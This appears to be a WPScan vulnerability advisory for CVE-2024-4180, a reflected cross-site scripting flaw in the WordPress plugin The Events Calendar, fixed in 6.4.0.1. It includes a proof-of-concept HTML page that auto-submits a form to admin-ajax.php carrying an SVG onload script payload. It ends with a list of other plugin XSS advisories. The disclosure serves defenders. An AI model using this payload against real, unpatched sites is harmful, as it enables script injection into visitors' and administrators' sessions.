The Events Calendar < 6.4.0.1 – Reflected XSS | CVE 2024-4180 | Plugin Vulnerabilities

Description

The plugin does not properly sanitize user-submitted content when rendering some views via AJAX.

Proof of Concept

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>The Events Calendar <= 6.3.6 - Reflected XSS</title>
</head>
<body onload="document.getElementById('autoSubmitForm').submit();">
    <form id="autoSubmitForm" action="http://vulnerablesite.tld/wp-admin/admin-ajax.php" method="POST">
        <input type="hidden" name="action" value="tribe_events_views_v2_fallback">
        <input type="hidden" name="view" value="reflector">
        <input type="hidden" name="view_data[lala]" value="<svg onload=alert(document.domain);></svg>">
    </form>
</body>
</html>

Affects Plugins

the-events-calendar

Fixed in 6.4.0.1

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Marc Montpas

Submitter

Marc Montpas

Submitter website

https://wpscan.com

Submitter twitter

Verified

Yes

WPVDB ID

b2a92316-e404-4a5e-8426-f88df6e87550

Timeline

Publicly Published

2024-05-14 (about 1 year ago)

Added

2024-05-14 (about 1 year ago)

Last Updated

2024-05-14 (about 1 year ago)

Other

Published

Title

Published

2025-02-02

Title

Visitor Details <= 1.0.1 - Unauthenticated Stored Cross-Site Scripting

Published

2021-06-22

Title

Pricing Table by Supsystic < 1.9.5 - Reflected Cross-Site Scripting

Published

2021-02-08

Title

Digital Publications by Supsystic < 1.7.0 - Authenticated Stored Cross-Site Scripting (XSS)

Published

2025-01-16

Title

REDIRECTION PLUS <= 2.0.0 - Reflected Cross-Site Scripting

Published

2024-01-19

Title

Formzu WP < 1.6.8 - Authenticated (Contributor+) Stored Cross-Site Scripting